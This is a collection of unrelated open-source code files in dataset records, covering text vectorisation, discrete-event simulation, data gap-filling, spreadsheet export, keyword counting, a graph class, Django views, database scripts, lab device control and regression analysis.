self.saveData(\"train_top\"+str(topx_occuring_words)+destination,self.bagOfWords,self.train_vectorized,self.trainData,add_columns,description)\n print(\"saving test data as csv...\")\n self.saveData(\"test_top\"+str(topx_occuring_words)+destination,self.bagOfWords,self.test_vectorized,self.testData,add_columns,description)\n \n def wordCounDicAndTokenizedData(self,data):\n t = Tokenizer()\n #specific columns NOT DONE\n if self.columns:\n #tokens = t.tokenize(np.array_str(self.data[:,self.columns]))\n selected_data = data[:,self.columns]\n else:\n #tokens = t.tokenize(np.array_str(self.data))\n selected_data = data\n \n wordDic = {}\n #print(len(tokens),np.array_str(self.data[:,self.columns]) )\n tokenizedData = []\n\n for i_row in selected_data:\n \n tokens = t.tokenize(str(i_row)[2:-2])\n tokenized_row = []\n for token in tokens:\n partOfSpeech = token.part_of_speech.split(',')[0]\n ts = token.surface\n if partOfSpeech != u'助詞':\n if ts in wordDic:\n wordDic[ts] += 1\n else:\n wordDic[ts] = 1\n tokenized_row.append(ts)\n \n tokenizedData.append(tokenized_row)\n tokenizedData = np.array(tokenizedData)\n return wordDic,tokenizedData\n def createBag(self,top_x_occuring,remove_words,wordDic):\n self.top_x_occuring = top_x_occuring\n sorted_words = sorted(wordDic, key=wordDic.get)\n for i_word in remove_words:\n try:\n sorted_words.remove(i_word)\n except:\n continue\n sorted_wordsTopx = sorted_words[-1*top_x_occuring:]\n bagOfWords = np.array(sorted_wordsTopx)\n return bagOfWords\n def tfidf(self):\n pass\n \"\"\"\n In information retrieval, tf–idf, short for term frequency–inverse document frequency,\n is a numerical statistic that is intended to reflect how important a word is\n to a document in a collection or corpus.[1] It is often used as a weighting factor \n in information retrieval and text mining. The tf-idf value increases proportionally \n to the number of times a word appears in the document, but is offset by the frequency \n of the word in the corpus, \n which helps to adjust for the fact that some words appear more frequently in general.\n ex. 'the' is very common so it is weighted very lightly . 
more generaly unique terms\n are weighted heavily.\n \"\"\"\n def vectorize(self,tokenizedData,bagOfWords,):\n bagSize = bagOfWords.shape[0]\n vectorizedData = np.zeros([tokenizedData.shape[0],bagSize])\n iteration = 0\n for i_row in tokenizedData:\n words_vec =[0]*bagSize\n for ii_word_from_bag in range(len(bagOfWords)):\n words_vec[ii_word_from_bag] = i_row.count(bagOfWords[ii_word_from_bag])\n vectorizedData[iteration] = words_vec\n iteration += 1\n return vectorizedData \n def saveData(self, destination,bagOfWords,vectorizedData,data , add_columns = None,description=None):\n with open(destination,\"w\", encoding='utf8') as f:\n # description row\n desc = np.array_str(bagOfWords)[1:-1].replace(\" \",\",\")\n desc = desc.replace(\"\\n\",\"\")\n desc = desc.replace(\"'\",\"\")\n if description:\n for i in description:\n desc += \",\"+i\n f.write(desc + \"\\n\")\n # end desctiption\n iteration = 0\n for i_row in vectorizedData:\n if add_columns:\n to_add = np.append(i_row, data[iteration,add_columns])\n else:\n to_add = i_row \n to_add = np.array_str(to_add)[1:-1].replace(\" \",\",\")\n to_add = to_add.replace(\"\\n\",\"\")\n to_add = to_add.replace(\"'\",\"\")\n f.write(to_add + \"\\n\")\n iteration += 1\n\n\n\nb = BagOfWords()\nrem = [ 'い', 'まし', '\\n', 'ます', 'し', 'です', 'た', '、', ',', '。',\n 'さ', '・', 'ん','で', '!', 'でし', 'ませ', '\\u3000', ' ', 'れ',\n 'う', '(', ')', ' ', '。,', '/', 'お',\"'\", 'の', 'な', 'ない',\n '(',')','\\\\','\\n ',\"!'\",'u']\nb.createData(\"comments_data.csv\",[0,1],splitData=0.1,topx_occuring_words=120,\n remove_words = rem,destination = \".csv\",add_columns=[-2,-1],description=[\"歳\",\"役に立った\"])\n#b.createWordCountDic()\n#b.createBag(500,rem) \n#b.vectorize()\n#b.saveData(\"vec_top500.csv\",[-2,-1],description=[\"歳\",\"役に立った\"])","repo_name":"chavdim/amazon_comments","sub_path":"bag_of_words/bag_of_words.py","file_name":"bag_of_words.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"6228834262","text":"'''\n (1) Primeiro passo é a instalação da biblioteca Simpy, Randon e alguma biblioteca gráfica\n\n (2) Criação de uma função para geração de entidades\n\n'''\n\n#Importando o Simpy que serve para implementar o modelo de Simulação de Eventos Discretos\nimport simpy\n\n'''#Importando o Random para que possamos gerar números aleatórios para basearmos o exemplo\nimport random'''\n\n#Criando uma biblioteca de distribuição de tempo\ndef distribuicao(tipo):\n return {\n 'FeSiAl' : 32,\n 'Tial' : 25,\n 'Desoxidante' : 10,\n }.get(tipo, 0.0) #Pega o tempo em função do tipo, se não houver vai ser 0\n\n\n# Função que define o processo da chegada\ndef geraChegadas(env, nome, limiteproducao):\n print(f\"Produto {nome} chega ao processo em {env.now}\")\n\n contaChegada = 0\n #Traz o tempo gasto para chegar cada produto\n taxa = distribuicao(nome)\n #Função que cria chegadas de entidades no sistema\n while contaChegada < limiteproducao:\n\n #Definindo o tempo do próximo evento\n yield env.timeout(taxa)\n contaChegada = contaChegada + 1 \n \n print(f\" O produto {nome}, de posição {contaChegada} chega em {env.now:0.1f}\")\n\n#random.seed(1000) #Semente geradora de número aleatório (fixando eles)\n#Criando o ambiente do modelo na variável env\nenv = simpy.Environment()\n\n#Criando o processo que chama a função de geração de chegadas\n#Aderindo a colocação de um limitador de quantidade de produtos que podem chegar\nenv.process(geraChegadas(env, 
\"FeSiAl\",12))\n\nenv.run()\n'''#Define o tempo da simulação\nenv.run(until=10)\n'''\n\n\n\n\n'''# Aguarda até que o caixa esteja livre\n yield req\n print(f\"Produto {nome} começa a ser processado em {env.now}\")\n\n # Tempo de processamento\n yield env.timeout(10) \n print(f\"Produto {nome} finaliza o processamento em {env.now}\")\n\n# Função que define o processamento do produto\ndef processo(env):\n while True:\n print(f\"Processo começa a funcionar em {env.now}\")\n yield env.timeout(50) # Tempo de trabalho\n print(f\"Processo encerra o funcionamento em {env.now}\")\n\n# Configuração da simulação\nenv = simpy.Environment()\nequipamento = simpy.Resource(env, capacity=1) # Capacidade do caixa\n\n# Criação de eventos iniciais\nenv.process(processo(env))\nenv.process(geraChegadas(env, \"A\", equipamento))\nenv.process(geraChegadas(env, \"B\", equipamento))\nenv.process(geraChegadas(env, \"C\", equipamento))\n\n# Inicia a simulação\nenv.run(until=10) # Duração da simulação\n\n'''\n","repo_name":"matavila/Simula-aoEventosDiscretoLanchonete","sub_path":"SimulacaoDiscreta.py","file_name":"SimulacaoDiscreta.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"1659137668","text":"import sys\nimport numpy as np\nfrom scitbx import Yaml\n\ndef make_gap_pipeline(config_path, df, flux):\n cfg = Yaml(config_path).load()\n if not isinstance(flux, list):\n flux = [flux]\n series = df[flux]\n\n np.random.seed(0)\n pointers = np.arange(len(series))\n samples = []\n for gap in cfg[\"gaps\"]:\n # print(gap)\n window_size = gap[\"window_size\"]\n p = cfg[\"tgr\"] * gap[\"ratio\"]\n sample, pointers = make_gaps(pointers, window_size, p, series)\n samples.extend(sample)\n\n train_idxs = pointers\n test_idxs = np.array(samples)\n # remove NaNs in both train and test indices:\n train_idxs = train_idxs[np.where(np.isfinite(series.iloc[train_idxs]))[0]]\n test_idxs = test_idxs[np.where(np.isfinite(series.iloc[test_idxs]))[0]]\n\n return train_idxs, test_idxs\n\ndef make_gaps(pointers, window_size, rgap, series, rbak = 3, vtheta = 0.5):\n length = len(series)\n intersect = np.intersect1d(pointers, pointers - (window_size - 1))\n\n n_gap = np.int(length * rgap / window_size)\n\n anchors = np.random.choice(intersect, np.ceil(n_gap * rbak).astype(np.int))\n\n samples = []\n count = 0\n for idx, anc in enumerate(anchors):\n sample = np.arange(anc, anc + window_size)\n tmp_series = series.iloc[sample, :]\n if np.isin(sample, intersect).all(): # sample must all in the inersect\n if (idx > 0) and (np.min(np.abs(anchors[0: idx] - anc)) < window_size): # anc should be far from recorded anchors\n continue\n if len(tmp_series.dropna()) / len(tmp_series) < vtheta:\n continue\n pointers = np.setdiff1d(pointers, sample)\n samples.extend(sample.tolist())\n count += 1\n if count >= n_gap:\n break\n return samples, pointers","repo_name":"soonyenju/fluxlib","sub_path":"fluxlib-history-versions/fluxlib-0.0.13/gapfill/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"79"} +{"seq_id":"22022399922","text":"#!python3 \r\n#TXTtoSS.py - opens a spreadsheet and writes the context of your text files into a spreadsheet, the columns represents the number of textFiles being read and the rows is the context with newline delimited\r\n#input - text files\r\n#output - spreadsheet\r\n\r\nimport openpyxl\r\nfrom openpyxl.utils 
import get_column_letter\r\n\r\ndef main():\r\n\tfList = []\r\n\twb = openpyxl.Workbook()\r\n\tsheet = wb.active\r\n\twhile(True):\r\n\t\tuser = input('Enter your filename or press enter to quit: ')\r\n\t\tif (user ==''):\r\n\t\t\tbreak\r\n\t\tfList.append(user)\r\n\t#the for loop represents the column\r\n\tfor textFile in range(len(fList)): \r\n\t\ttry:\r\n\t\t\tnewFile = open(fList[textFile],'r')\r\n\t\texcept FileNotFoundError: \r\n\t\t\tprint('\"'+fList[textFile] +'\" does not exist')\r\n\t\t\tcontinue\r\n\t\trowList = newFile.readlines()\r\n\t\t#for the row\r\n\t\tfor rowNum in range(len(rowList)):\r\n\t\t\tsheet[get_column_letter(textFile+1)+str(rowNum+1)]=rowList[rowNum]\r\n\twb.save('ss.xlsx')\r\n\t\t\r\nif __name__=='__main__':\r\n\tmain()","repo_name":"dromero23/Python-Automate-The-Boring-Stuff-","sub_path":"Chapter 12/TXTtoSS.py","file_name":"TXTtoSS.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74954946814","text":"comment_dir = 'D:/作业/太空旅客.txt'\r\nadic1 ='D:/作业/词典/角色/反派.txt'\r\nadic2 = 'D:/作业/词典/角色/角色.txt'\r\nadic3 = 'D:/作业/词典/角色/角色中的其他.txt'\r\nadic4 = 'D:/作业/词典/角色/男主角.txt'\r\nadic5 = 'D:/作业/词典/角色/女主角.txt'\r\nadic6 = 'D:/作业/词典/角色/配角.txt'\r\nadic7 = 'D:/作业/词典/剧情/发展.txt'\r\nadic8 = 'D:/作业/词典/剧情/结局.txt'\r\nadic9 = 'D:/作业/词典/剧情/剧情.txt'\r\nadic10 = 'D:/作业/词典/剧情/开头.txt'\r\nadic11 = 'D:/作业/词典/剧情/泪点.txt'\r\nadic12 = 'D:/作业/词典/剧情/笑点.txt'\r\nadic13 = 'D:/作业/词典/视听/动作.txt'\r\nadic14 = 'D:/作业/词典/视听/画面.txt'\r\nadic15 = 'D:/作业/词典/视听/镜头.txt'\r\nadic16 = 'D:/作业/词典/视听/试听效果中的其他.txt'\r\nadic17 = 'D:/作业/词典/视听/视听.txt'\r\nadic18 = 'D:/作业/词典/视听/音乐.txt'\r\nadic19 = 'D:/作业/词典/制作/编剧.txt'\r\nadic20 = 'D:/作业/词典/制作/出品公司.txt'\r\nadic21 = 'D:/作业/词典/制作/导演.txt'\r\nadic22 = 'D:/作业/词典/制作/选景.txt'\r\nadic23 = 'D:/作业/词典/制作/制作.txt'\r\nadic24 = 'D:/作业/词典/主题/风格.txt'\r\nadic25 = 'D:/作业/词典/主题/题材内容.txt'\r\nadic26 = 'D:/作业/词典/主题/主题.txt'\r\ndictionary = [adic1, adic2, adic3, adic4, adic5, adic6, adic7, adic8, adic9, adic10, adic11, adic12, adic13, adic14, adic15, adic16, adic17, adic18, adic19, adic20, adic21, adic22, adic23, adic24, adic25,\r\n adic26]\r\ntimes = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0] # B每一个关注点出现的次数\r\nwords = ['角色-反派', '角色-角色', '角色-角色中的其他', '角色-男主角', '角色-女主角', '角色-配角',\r\n '剧情-发展', '剧情-结局', '剧情-剧情', '剧情-开头', '剧情-泪点', '剧情-笑点',\r\n '视听-动作', '视听-画面', '视听-镜头', '视听-视听效果中的其他', '视听-视听', '视听-音乐',\r\n '制作-编剧', '制作-出品公司', '制作-导演', '制作-选景', '制作-制作',\r\n '主题-风格', '主题-题材内容', '主题-主题']\r\n#先把词典的路径放进一个列表dictionary,再对应词典名字再建一个列表words,创建列表times对应每个词典中在评论文件中出现的次数\r\n\r\n#可优化之处:可以搭建一个函数其功能为:获取'D:/作业/词典'下所有子目录中的文件和路径,对应建以上列表,但是鉴于文件路径获取等方法尚不会暂不写出\r\n\r\nimport re #正则\r\nfile = open(comment_dir, 'r', encoding='UTF-8') #打开评论文件\r\ncomment=file.read() #读取评论文件\r\nfor i in range(26): #将26个词典中的标注词和评论文件所有的评论进行匹配,若匹配成功,对应的标注词的分类的次数就加匹配出的个数\r\n if i==21:\r\n dicfile = open(dictionary[i], 'r')\r\n else:\r\n dicfile = open(dictionary[i], 'r', encoding='UTF-8')\r\n #因为测试出有一个词典文件编码形式是ANSI(测试的代码省略,我暂时是用print和循环测试的),可采取以下方法:\r\n #1.将此文件转换为utf-8\r\n #2.找出文件位置,将对应的路径文件单独打开...\r\n #在此处因为知识有限,采用了第二种方法,同时也导致了这个程序失去了一���性(日后请考虑优化)\r\n for word in dicfile.readlines():\r\n find_result= re.findall(word,comment) #注意正则表达式的search,findall等函数的区别(这样就把find_result变成一个列表可求长度)\r\n times[i]=times[i]+len(find_result)\r\n#print(times)\r\nresult={} #创建一个空的词典\r\nfor i in range(26):\r\n result[words[i]]=times[i] #将词典文件名字和次数对应起来\r\nprint(result) 
#通过比较次数可得评论的关注点\r\n\r\n\r\n\r\n#最后总结:此程序显然只是针对这几个文件的,没有一般性,也没有封装起来,可是因为对文件的操作函数的不熟悉以及语言的初识,没有能很好的解决这些问题和漏洞。\r\n#1.刚开始,想自己写简单的字符串匹配函数,写了很久,有没有测试成功,最后还是使用了正则表达式,接下来可以研究。\r\n#2.文件的打开也困扰了我很久,没有txt后缀还有编码形式的不同都要花功夫去写程序检测,检测出来还要想出方法解决。\r\n#3.其实还有一个就是到现在也不是很明白什么是关注点?是算关注度百分比还是只要比较出评论最多的几个词?\r\n","repo_name":"PuJes/python-study-1-","sub_path":"python study(1).py","file_name":"python study(1).py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"36618810832","text":"class GraphNode():\n def __init__(self, data):\n self.data = data\n\n\nclass GraphWithAdjacencyList():\n #we can assume the graph is undirected\n def __init__(self, AdjacencyList = {}, nodes = []):\n self.AdjacencyList = AdjacencyList\n self.nodes = nodes \n\n\n def findNode(self, key):\n #added additional function to help with finding nodes corresponding to keys\n for i in self.AdjacencyList.keys():\n if i.data == key:\n return i\n\n\n def addNode(self, key):\n #doesn't allow for duplicates\n if key in self.nodes:\n raise ValueError (\"Key already in graph\")\n\n node = GraphNode(key)\n self.AdjacencyList[node] = set()\n self.nodes.append(key)\n\n\n\n def removeNode(self, key):\n if not key in self.nodes:\n raise ValueError (\"Key not in graph\")\n \n del self.AdjacencyList[self.findNode(key)]\n self.nodes.remove(key)\n\n\n\n def addEdge(self, node1, node2):\n if not node1 in self.nodes and not node2 in self.nodes:\n raise ValueError (\"Both nodes are not in graph\")\n\n elif not node1 in self.nodes or not node2 in self.nodes:\n raise ValueError (\"One node is not in graph\")\n\n #Since graph is undirected we add both edges into the adjacency list\n self.AdjacencyList[self.findNode(node1)].add(self.findNode(node2))\n self.AdjacencyList[self.findNode(node2)].add(self.findNode(node1))\n\n\n def removeEdge(self, node1, node2):\n if not node1 in self.nodes and not node2 in self.nodes:\n raise ValueError (\"Both nodes are not in graph\")\n\n elif not node1 in self.nodes or not node2 in self.nodes:\n raise ValueError (\"One node is not in graph\") \n\n #Since graph is undirected we remove both edges from the adjacency list\n self.AdjacencyList[self.findNode(node1)].remove(self.findNode(node2))\n self.AdjacencyList[self.findNode(node2)].remove(self.findNode(node1))\n\n\n def getAdjNodes(self, key):\n if key not in self.nodes:\n raise ValueError (\"Key not in graph\")\n\n else:\n adjacent_nodes = set()\n for node in self.AdjacencyList[self.findNode(key)]:\n adjacent_nodes.add(node.data)\n \n return adjacent_nodes\n\n\nif __name__ == \"__main__\":\n graph = GraphWithAdjacencyList()\n graph.addNode(1)\n graph.addNode(2)\n graph.addNode(3)\n graph.addNode(4)\n\n# 1 - 2\n# | |\n# 3 - 4\n\n graph.addEdge(1, 2)\n graph.addEdge(1, 3)\n graph.addEdge(3, 4)\n graph.addEdge(2, 4)\n\n assert(graph.getAdjNodes(1) == {2, 3})\n assert(graph.getAdjNodes(2) == {1, 4})\n assert(graph.getAdjNodes(3) == {1, 4})\n assert(graph.getAdjNodes(4) == {2, 3})\n\n graph.removeEdge(1, 2)\n graph.removeEdge(1, 3)\n graph.removeEdge(3, 4)\n graph.removeEdge(2, 4)\n\n assert(graph.getAdjNodes(1) == set())\n assert(graph.getAdjNodes(2) == set())\n assert(graph.getAdjNodes(3) == set())\n assert(graph.getAdjNodes(4) == set())\n\n try:\n graph.addNode(1)\n except:\n ValueError\n\n try:\n graph.removeNode(5)\n except:\n ValueError\n\n try:\n graph.getAdjNodes(5)\n except:\n ValueError\n\n try:\n graph.addEdge(5, 1)\n except:\n ValueError\n\n try:\n graph.removeEdge(5, 6)\n 
except:\n ValueError\n \n \n","repo_name":"ubercareerprep2022/Uber-Career-Prep-Homework-Wassay-Qureshi","sub_path":"Assignment-2/GraphEx1.py","file_name":"GraphEx1.py","file_ext":"py","file_size_in_byte":3430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7679180037","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib import messages\nfrom django.http import JsonResponse, HttpResponse\nfrom django.views.decorators.http import require_POST\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib.postgres.search import TrigramSimilarity\nfrom taggit.models import Tag\nfrom .forms import SnippetCreateForm, SearchForm\nfrom .models import Snippet\n\n\nimport redis\nfrom django.conf import settings\n# connect to redis\nr = redis.Redis(host=settings.REDIS_HOST,\n port=settings.REDIS_PORT,\n db=settings.REDIS_DB)\n\n@login_required\ndef snippet_create(request):\n if request.method == 'POST':\n form = SnippetCreateForm(data=request.POST)\n if form.is_valid():\n new_snippet = form.save(commit=False)\n # assign current user to the item\n new_snippet.user = request.user\n new_snippet.save()\n form.save_m2m()\n messages.success(request, 'Snippet added successfully')\n # redirect to new created item detail view\n return redirect(new_snippet.get_absolute_url())\n else:\n form = SnippetCreateForm()\n return render(request, 'snippets/snippet/create.html', {'section': 'snippets', 'form': form})\n\n\ndef snippet_detail(request, id, slug):\n snippet = get_object_or_404(Snippet, id=id, slug=slug)\n total_views = r.incr(f'snippet:{snippet.id}:views')\n # string: language,style,linenos for custom template tag\n snippet_config = f\"{snippet.language},{snippet.style},{snippet.linenos}\"\n return render(request, 'snippets/snippet/detail.html', {'section': 'snippets', 'snippet': snippet,\n 'snippet_config': snippet_config,\n 'total_views': total_views})\n\n\n@login_required\n@require_POST\ndef snippet_like(request):\n snippet_id = request.POST.get('id')\n action = request.POST.get('action')\n if snippet_id and action:\n try:\n snippet = Snippet.objects.get(id=snippet_id)\n if action == 'like':\n snippet.users_like.add(request.user)\n else:\n snippet.users_like.remove(request.user)\n return JsonResponse({'status': 'ok'})\n except:\n pass\n return JsonResponse({'status': 'error'})\n\n\ndef snippet_list(request, tag_slug=None):\n snippets = Snippet.objects.all()\n tag = None\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n snippets = snippets.filter(tags__in=[tag])\n paginator = Paginator(snippets, 8)\n page = request.GET.get('page')\n snippets_only = request.GET.get('snippets_only')\n try:\n snippets = paginator.page(page)\n except PageNotAnInteger:\n snippets = paginator.page(1)\n except EmptyPage:\n if snippets_only:\n return HttpResponse('')\n snippets = paginator.page(paginator.num_pages)\n if snippets_only:\n return render(request, 'snippets/snippet/list_snippets.html', {'section': 'images', 'snippets': snippets, 'tag': tag})\n return render(request, 'snippets/snippet/list.html', {'section': 'snippets', 'snippets': snippets, 'tag': tag})\n\n\ndef snippet_search(request):\n form = SearchForm()\n query = None\n results = []\n if 'query' in request.GET:\n form = SearchForm(request.GET)\n if form.is_valid():\n query = form.cleaned_data['query']\n results = Snippet.objects.annotate(\n 
similarity=TrigramSimilarity('title', query),\n ).filter(similarity__gt=0.1).order_by('-similarity')\n return render(request, 'snippets/snippet/search.html', {'form': form, 'query': query, 'results': results})","repo_name":"raj3k/code_snip","sub_path":"snippets/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3868,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"14713121249","text":"from db import new_connection\nfrom mysql.connector import ProgrammingError\n\ndrop_tabela_emails = \"DROP TABLE IF EXISTS emails\"\n\nwith new_connection() as conn:\n try:\n cursor = conn.cursor()\n cursor.execute(drop_tabela_emails)\n except ProgrammingError as e:\n print(f\"Erro: {e.msg}\")\n","repo_name":"wagnerberna/cursos-python","sub_path":"coder_python/Projeto-python-MySQL/04-drop_table_email.py","file_name":"04-drop_table_email.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38103020854","text":"# root directory that contain all vehicle images in nested subdirectories\nroot_data_vehicle = '../../../NANODEGREE/term_1/project_5_vehicle_detection/vehicles'\n\n# root directory that contain all NON-vehicle images in nested subdirectories\nroot_data_non_vehicle = '../../../NANODEGREE/term_1/project_5_vehicle_detection/non-vehicles'\n\n# parameters used in the phase of feature extraction\nfeat_extraction_params = {'resize_h': 64, # resize image height before feat extraction\n 'resize_w': 64, # resize image height before feat extraction\n 'color_space': 'YCrCb', # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\n 'orient': 9, # HOG orientations\n 'pix_per_cell': 8, # HOG pixels per cell\n 'cell_per_block': 2, # HOG cells per block\n 'hog_channel': \"ALL\", # Can be 0, 1, 2, or \"ALL\"\n 'spatial_size': (32, 32), # Spatial binning dimensions\n 'hist_bins': 16, # Number of histogram bins\n 'spatial_feat': True, # Spatial features on or off\n 'hist_feat': True, # Histogram features on or off\n 'hog_feat': True} # HOG features on or off\n\n\n\n\n\n\n\n","repo_name":"ndrplz/self-driving-car","sub_path":"project_5_vehicle_detection/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1403,"program_lang":"python","lang":"en","doc_type":"code","stars":2642,"dataset":"github-code","pt":"79"} +{"seq_id":"32055126138","text":"from threading import Thread\nimport os\nimport time\nimport logging\n\nfrom azure.eventhub import EventHubClient, EventPosition, EventHubSharedKeyCredential, EventData\n\nimport examples\nlogger = examples.get_logger(logging.INFO)\n\n\nHOSTNAME = os.environ.get('EVENT_HUB_HOSTNAME') # .servicebus.windows.net\nEVENT_HUB = os.environ.get('EVENT_HUB_NAME')\n\nUSER = os.environ.get('EVENT_HUB_SAS_POLICY')\nKEY = os.environ.get('EVENT_HUB_SAS_KEY')\n\nEVENT_POSITION = EventPosition(\"-1\")\n\n\nclass PartitionConsumerThread(Thread):\n def __init__(self, consumer):\n Thread.__init__(self)\n self.consumer = consumer\n\n def run(self):\n for item in self.consumer:\n print(item)\n\n\nclient = EventHubClient(host=HOSTNAME, event_hub_path=EVENT_HUB, credential=EventHubSharedKeyCredential(USER, KEY),\n network_tracing=False)\nconsumer = client.create_consumer(consumer_group=\"$default\", partition_id=\"0\", event_position=EVENT_POSITION)\nwith consumer:\n thread = PartitionConsumerThread(consumer)\n thread.start()\n thread.join(2) # stop after 2 
seconds\n","repo_name":"mccoyp/azure-keyvault-7.3-preview","sub_path":"sdk/eventhub/azure-eventhubs/examples/iterator_receiver.py","file_name":"iterator_receiver.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"38107031644","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 15 15:19:44 2021\n@author: Nathan Drouillard\n\"\"\"\n\nimport serial\nimport time\n\n#%% Open the COM port\n\nser = serial.Serial('/dev/ttyUSB_MICRONIX',38400)\n\n#%% Home the stage\n\ndef home():\n\n ser.write(b'1HOM\\r')\n ser.flush()\n time.sleep(1)\n #ser.write(b'1WTM42\\r')\n ser.write(b'1WST\\r')\n time.sleep(1)\n print(\"stopped\")\n ser.flush()\n #isstopped = ser.readline()\n ser.write(b'1ZRO\\r')\n time.sleep(1)\n ser.flush()\n #zeroed = ser.readline()\n print(\"zeroed\")\n\n#%% Setup for feedback loop\n\ndef params():\n min_pos = -1\n max_pos = 1\n\n ser.write(b'1VEL5.0\\r') #set velocity to 5 mm/s\n time.sleep(1)\n ser.flush()\n #velset = ser.readline()\n print(\"velset\")\n\n min_pos_str = \"1TLN\" + str(min_pos) + \"\\r\"\n # ser.write(b'1POS?\\r')\n # ser.write(b'1MVA0\\r')\n min_pos_byt = str.encode(min_pos_str) #encode soft travel limit in the negative direction\n ser.write(min_pos_byt) #write it to the controller\n ser.flush()\n #neglim = ser.readline()\n time.sleep(1)\n print(\"neglim\")\n\n max_pos_str = \"1TLP\" + str(max_pos) + \"\\r\"\n max_pos_byt = str.encode(max_pos_str)\n ser.write(max_pos_byt)\n ser.flush()\n #poslim = ser.readline()\n time.sleep(1)\n print(\"poslim\")\n\n ser.write(b'1EPL1\\r') #ensure the correct encoder polarity for the feedback loop\n ser.flush()\n #polset = ser.readline()\n ser.write(b'1FBK3\\r') #closed loop feedback mode\n ser.flush()\n #fbkset = ser.readline()\n ser.write(b'4DBD5,0\\r') #set closed loop deadband parameters (0 means it will never timeout)\n ser.flush()\n time.sleep(1)\n print(\"Params set\")\n #dbdset = ser.readline()\n\n#%% Move the stage (moves one way, but not back and forth)\n\ndef move():\n\n #home()\n #time.sleep()\n #params()\n for i in range(0,4):\n # ser.write(b'1PGL0\\r') #loop program continuously\n ser.write(b'1MLN\\r') #move to negative limit\n time.sleep(1)\n print(\"moved neg\")\n # ser.write(b'1MVA-2\\r')\n ser.flush()\n ser.write(b'1WST\\r')\n time.sleep(1)\n ser.flush()\n #movedneg = ser.readline()\n #ser.flush()\n #print(movedneg)\n # ser.write(b'1WTM5000\\r') #wait for 5000 ms\n ser.write(b'1MLP\\r') #move to positive limit\n # ser.write(b'1MVA2\\r')\n time.sleep(1)\n ser.flush()\n ser.write(b'1WST\\r')\n time.sleep(1)\n ser.flush()\n #movedpos = ser.readline()\n #ser.flush()\n print(\"movedpos\")\n\n#%% Close COM port (important)\n\ndef close():\n\n ser.close()\n\nhome()\nparams()\n#time.sleep(1)\nmove()\n#close()\n","repo_name":"ndrouillard/FTIR-Notebook","sub_path":"micronix_functions_final.py","file_name":"micronix_functions_final.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7363010975","text":"import pandas as pd\r\nimport numpy as np\r\ndata = pd.read_csv(\"~/documents/calories_consumed.csv\")\r\ndata\r\ndata.info()\r\ndata.describe()\r\ndata.columns\r\n# measure of central tendency or first moment business decisions\r\ndata.mean()\r\ndata.median()\r\ndata.mode()\r\n## measure of despersion or second business moment decisions\r\ndata.std()\r\ndata.var()\r\n# third moment business 
decisions\r\ndata.skew()\r\n# fourth moment business decisions\r\ndata.kurt()\r\nimport matplotlib.pyplot as plt\r\n\r\nplt.bar(height = data.weight, x = np.arange(1,15,1))\r\nplt.bar(height = data.calories, x= np.arange(1,15,1))\r\n\r\nplt.boxplot(data.weight) ## we have no outliers\r\nplt.boxplot(data.calories) # we have no outliers\r\n\r\nplt.hist(data.weight) # the distribution is right skewed\r\nplt.hist(data.calories)# right skewed distribution\r\nimport statsmodels.api as sm\r\nsm.qqplot(data)\r\nsm.qqplot(data.weight)\r\nsm.qqplot(data.calories)\r\n# By visualizing histogram, boxplot, qqplots\r\n# we can say the data is normally distributed.\r\nplt.scatter(x = data.weight, y = data.calories, color = 'black')\r\n# correlation \r\nnp.corrcoef(data.weight, data.calories)\r\n# if we have |r| > 0.85, then we can say the correlation is strong\r\n\r\n# also we can say by observing the above scatter plot and correlation\r\n#The data is 1. linearly distributed\r\n #2. positively distributed\r\n #3. strong correlation\r\n \r\ncov_var = np.cov(data.weight,data.calories)\r\ncov_var\r\n\r\n# now we are all set to build a model\r\nimport statsmodels.formula.api as smf\r\nmodel = smf.ols(\"calories~weight\", data = data).fit()\r\nmodel.summary()\r\n\r\npred1 = model.predict(pd.DataFrame(data[\"weight\"]))\r\n\r\n# regression line\r\nplt.scatter(data.weight, data.calories)\r\nplt.plot(data.weight,pred1,\"r\")\r\nplt.legend(['Predicted line', 'Observed data'])\r\nplt.show()\r\n\r\n## error calculation\r\nres1 = data.calories - pred1\r\nres_sqr1 = (res1*res1)\r\nmse1 = np.mean(res_sqr1)\r\nrmse1 = np.sqrt(mse1)\r\nrmse1 ## we got an error = 232.833\r\n\r\n##### building a model on transformed data by using log transformations\r\n# x = log(weight); y = calories\r\nplt.scatter(x = np.log(data['weight']), y = data['calories'], color = 'blue')\r\nnp.corrcoef(np.log(data.weight),data.calories)\r\n\r\nmodel2 = smf.ols('calories~np.log(weight)',data = data).fit()\r\nmodel2.summary()\r\n\r\npred2 = model2.predict(pd.DataFrame(data['weight']))\r\n\r\n\r\n# regression 